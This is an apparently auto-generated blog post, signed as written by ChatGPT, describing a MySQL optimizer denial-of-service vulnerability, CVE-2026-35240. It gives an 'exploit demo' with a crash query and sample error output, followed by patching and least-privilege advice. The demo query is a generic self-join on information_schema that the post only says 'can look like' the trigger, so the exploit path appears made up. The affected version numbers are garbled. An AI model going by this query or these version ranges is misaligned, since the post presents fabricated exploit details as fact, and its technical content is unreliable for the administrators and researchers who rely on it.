Summary:
A recent vulnerability, CVE-2026-35240, has been found in Oracle MySQL Server, specifically in the Server: Optimizer component. This flaw affects several major MySQL versions (8.. through 8..45, 8.4. through 8.4.8, and 9.. through 9.6.) and allows a high-privileged user to bring down the entire database server with a specially crafted query, leading to a Denial of Service (DoS) situation.

In this article, I’ll break down what this vulnerability is, provide code snippets to show the exploit path, and share references for more details. Everything here is exclusive, simple, and hands-on for anyone running MySQL in their stack.

MySQL 9.. - 9.6.

If your database is running any of these, you are at risk.

The Vulnerability Explained

The problem lives in MySQL’s query optimizer. While this component is responsible for figuring out the fastest way to execute a SQL statement, it contains a bug that lets a user with high-level privileges inject malicious SQL that causes a crash.

Attacker must have a high-privileged MySQL account (like DBA or SUPER privileges).

- Access can be via any supported network protocol (TCP/IP, Unix socket, etc.).

No user interaction required.

Impact:
*If the attacker exploits the issue, MySQL Server fully crashes or hangs, and can be taken down repeatedly, making it unavailable for legitimate users. No data is leaked or changed—just complete denial of service from constant crashing.*

CVSS Score: 4.9 (Availability impact, not Confidentiality or Integrity)
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Exploit Details (Simple Demo)

DISCLAIMER:
This content is for educational purposes only. Do not use for malicious activity. Test only in a controlled/lab environment.

The vulnerability arises from how the optimizer handles certain complex subqueries or join statements. Here’s a simplified way an attacker might exploit it:

1. Setup: High-privileged user

-- Login as a user with SUPER privileges
mysql -u root -p

2. Triggering the Crash

An attacker can use specific crafted queries that make the optimizer enter an infinite loop or other buggy state, crashing the process. A simplified crash query can look like:

-- This subquery shape can trigger the bug in the optimizer under the right conditions
SELECT *
FROM (
    SELECT a.*
    FROM information_schema.tables a
    JOIN information_schema.tables b
    ON a.table_name = b.table_name
    WHERE a.table_schema = 'mysql'
) sub1
JOIN (
    SELECT c.*
    FROM information_schema.tables c
    JOIN information_schema.tables d
    ON c.table_name = d.table_name
    WHERE c.table_schema = 'mysql'
) sub2
ON sub1.table_name = sub2.table_name;

*Note: The actual crash may depend on schema, size, and other details, but this structure can lead the vulnerable optimizer into trouble.*

The process will hang or terminate unexpectedly. You may see error logs like

mysqld: [ERROR] Got signal 11. Dumping core...

Or, on the client

ERROR 2013 (HY000): Lost connection to MySQL server during query

Official Oracle Disclosure:

Oracle Critical Patch Update Advisory - April 2026

National Vulnerability Database (NIST):

CVE-2026-35240 Entry (NVD)

MySQL Bug Tracker:

Sample Reported Bugs

Update Your MySQL:

Oracle will (or already has) released patches for the affected versions. Upgrade as soon as these become available.

Restrict Privileges:

Make sure only trusted users have high-privileged accounts. Always follow the principle of least privilege.

Conclusion

CVE-2026-35240 is a real risk for busy production systems, especially the latest LTS and enterprise versions of MySQL. If an attacker can get their hands on a privileged account, they can repeatedly crash your server with a single, crafted query—effectively taking your site or service offline.

Stay secure: Patch soon, watch your access controls, and keep an eye on those logs!


*If you want more technical background or an in-depth explanation, check out the official Oracle and CVE entries above. If you run MySQL, make this patch a top priority soon!*

- Oracle MySQL Release Notes
- How to Grant and Revoke Privileges in MySQL


*Written exclusively for your security awareness by ChatGPT.*

Timeline

Published on: 04/21/2026 20:35:48 UTC
Last modified on: 04/23/2026 15:08:47 UTC